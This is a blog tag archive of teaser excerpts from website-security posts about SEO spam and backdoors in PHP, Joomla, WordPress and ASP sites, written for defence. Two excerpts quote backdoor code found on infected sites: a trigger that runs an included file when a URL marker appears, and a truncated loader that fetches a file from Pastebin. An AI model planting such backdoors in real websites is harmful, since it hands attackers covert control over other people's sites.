We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking and SEO poisoning. This time we’ll tell you about yet another interesting black hat SEO attack that we’ve been watching for the last year. Let’s begin with symptoms: When peopleRead […]
Tag Archives: backdoor
Return of the EXIF PHP Joomla Backdoor
Our Remediation and Research teams are in constant communication and collaboration. It’s how we stay ahead of the latest threats, but it also presents an opportunity to identify interesting threats that aren’t new but may be reoccuring. Such as today’s post, in which we explore a case we shared close to two years ago whereRead […]
Malicious Google Search Console Verifications
This past summer we noticed a trend of more and more Blackhat SEO hacks trying to verify additional accounts as owners of compromised sites in Google Search Console (formerly Webmaster Tools). Google Search Console provides really useful information and tools to webmasters who want to: Know how their websites perform in search results. Receive notification about performance, configuration and securityRead […]
Wigo Means Bingo for Blackseo Agent
This week my colleague Peter Gramantik showed me a few infected sites that had very similar code embedded in the WordPress index.php files: if (eregi(‘-dbst’,$_SERVER[‘REQUEST_URI’])) { error_reporting(0); include (‘license.txt’); exit(); } The code is very simple. It checks if a page URL has “-dbst” appended to the URL and executes code from an included file. AtRead […]
Website Backdoors Leverage the Pastebin Service
We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files. Here’s the backdoor code: if(array_keys($_GET)[0] == ‘up’){ $content = file_get_contents(“http://pastebin . com/raw.php?i=JK5r7NyS”); if($content){unlink(‘evex.php’); $fh2 […]
The Art of Website Malware Removal – The Basics
When talking about defense against malicious hacks, the attack vector is a common topic for Information Security (InfoSec) professionals. The primary concern is to understand the anatomy of the attack and prevent it from happening again. However, there is a less glamorous task that must take place once an attack vector is exploited; that is […]
ASP Backdoors? Sure! It’s not just about PHP
I recently came to the realization that it might appear that we’re partial to PHP and WordPress. This realization has brought about an overwhelming need to correct that perception. While they do make up an interesting percentage, there are various other platforms and languages that have similar if not more devastating implications. Take into consideration […]
Case Study: Complexities of “simple” malware
You know when you pull a string on a sweater and it just keeps going and going? You wonder when or if it will ever stop? From time to time, that’s how malware can feel. Even if you’re not a website security expert, it’s important to understand just how complicated hackers are willing to make […]
PHP Callback Functions: Another Way to Hide Backdoors
We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter. Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as […]
Joomla Plugin Constructor Backdoor
We recently wrote about backdoors in pirated commercial WordPress plugins. This time it will be a short post about an interesting backdoor we found in a Joomla plugin. It was so well organized that at first we didn’t realize there was a backdoor even though we knew something was wrong. Here’s what the code of […]